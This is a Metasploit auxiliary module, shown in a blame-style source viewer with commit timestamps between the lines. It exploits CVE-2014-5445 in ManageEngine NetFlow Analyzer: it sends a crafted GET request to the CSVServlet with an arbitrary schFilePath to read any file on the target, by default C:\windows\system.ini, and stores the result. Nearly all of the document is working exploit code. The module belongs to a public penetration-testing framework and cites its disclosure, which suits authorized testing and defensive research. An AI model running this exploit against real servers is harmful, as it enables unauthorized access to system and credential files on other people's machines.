metasploit-framework/modules/auxiliary/admin/http/netflow_file_download.rb

82 lines
2.5 KiB
Ruby
Raw Normal View History

2014-11-30 00:12:37 +00:00
##
2014-12-12 18:49:12 +00:00
# This module requires Metasploit: http://metasploit.com/download
2014-11-30 00:12:37 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
2014-12-01 00:44:03 +00:00
'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',
2014-11-30 00:12:37 +00:00
'Description' => %q{
2014-12-01 00:44:03 +00:00
This module exploits an arbitrary file download vulnerability in CSVServlet
on ManageEngine NetFlow Analyzer. This module has been tested on both Windows
and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you
must escape the backslash with a backslash.
2014-11-30 00:12:37 +00:00
},
2014-12-01 00:44:03 +00:00
'Author' =>
2014-11-30 00:12:37 +00:00
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
2014-12-01 00:44:03 +00:00
'License' => MSF_LICENSE,
2014-11-30 00:12:37 +00:00
'References' =>
[
[ 'CVE', '2014-5445' ],
2014-12-07 17:54:31 +00:00
[ 'OSVDB', '115340' ],
2014-11-30 00:12:37 +00:00
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
2014-12-04 21:32:19 +00:00
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
2014-11-30 00:12:37 +00:00
],
'DisclosureDate' => 'Nov 30 2014'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI',
[ true, "The base path to NetFlow Analyzer", '/netflow' ]),
OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),
2014-11-30 00:12:37 +00:00
], self.class)
end
def run
# Create request
begin
print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),
'vars_get' => { 'schFilePath' => datastore['FILEPATH'] },
})
2014-12-01 00:44:25 +00:00
rescue Rex::ConnectionError
2014-11-30 00:12:37 +00:00
print_error("#{peer} - Could not connect.")
return
end
# Show data if needed
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
return
end
vprint_line(res.body.to_s)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'netflow.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fname
)
2014-12-01 00:46:15 +00:00
print_good("#{peer} - File saved in: #{path}")
2014-11-30 00:12:37 +00:00
else
print_error("#{peer} - Failed to download file.")
end
end
end